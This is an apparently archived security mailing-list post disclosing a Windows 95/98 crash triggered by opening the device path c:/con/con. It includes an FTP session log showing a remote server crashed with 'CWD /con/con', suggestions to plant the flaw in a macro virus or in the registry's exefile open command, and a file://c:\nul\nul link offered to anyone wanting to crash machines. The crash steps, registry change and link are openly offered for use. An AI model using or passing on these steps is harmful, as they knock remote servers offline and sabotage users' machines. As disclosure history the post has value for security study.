-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- - ---- New exploit found by the securax crew on 3/3/error for: windoze 98 maybe 95 too... not for NT4 or win2K When we looked at the new exploit for ie that uses the image c:/con/con (http://www.zoomnet.net/~quick/error/crash.html) we experimented a bit with that unexisting path. We found that any program in windows 98 will crash if you try to open that file. eg: try Start --> run --> c:/con/con or open in Word the non-existing document c:/con/con both attempts will result in en Blues Screen of death and a lockup. This can also be exploited to crash remote servers Look what we tryed on this servU-FTP v 2.4a (works on any windoze 98 FTP even with anonyous or guest account) it looked something like this: 230 user logged in, proceed SYST 215 UNIX TYPE:L8 connect ok! PWD 257 "c:/home" is current directory. haal directory op TYPE A 200 Type set to A. PORT xx.xx.xx.xx :-) 200 PORT Command succesful LIST 150 Opening ASCII mode data connect Download: 86 bytes Wacht op de server 226 transfer complete CDUP 250 directory changed to /c:/ PWD 250 "/c:/" is current directory CWD /con/con --> this does the trick ... no more response :-) server crashed. This is probably just the beginning of a new series of exploits for windoze. this little flaw could easily be used in a macro virus. maybe even be placed in the registry HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open c:\con\con "%1" %* Da G#Df@RTER & Pathos (securax) www.securax.org - ---------------------------------------------------------------------- - ---- this is a really old thing, (good but old), we found it, like 1 year ago with the nul/nul, (now are con/con) and we found others but all with the same error overflow over Explorer.exe and VFat, windows 95 and windows 98. to anyone who want to crash the windows 9x click : here >file://c:\nul\nul< u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOMPvBNybEYfHhkiVEQKedQCfYYyh2G1TOaE5HdtXo0eNc+/K2lgAoIkt U+6L5I9uSGENV3KFuyKQ8xqu =vwMM -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:39:02 PDT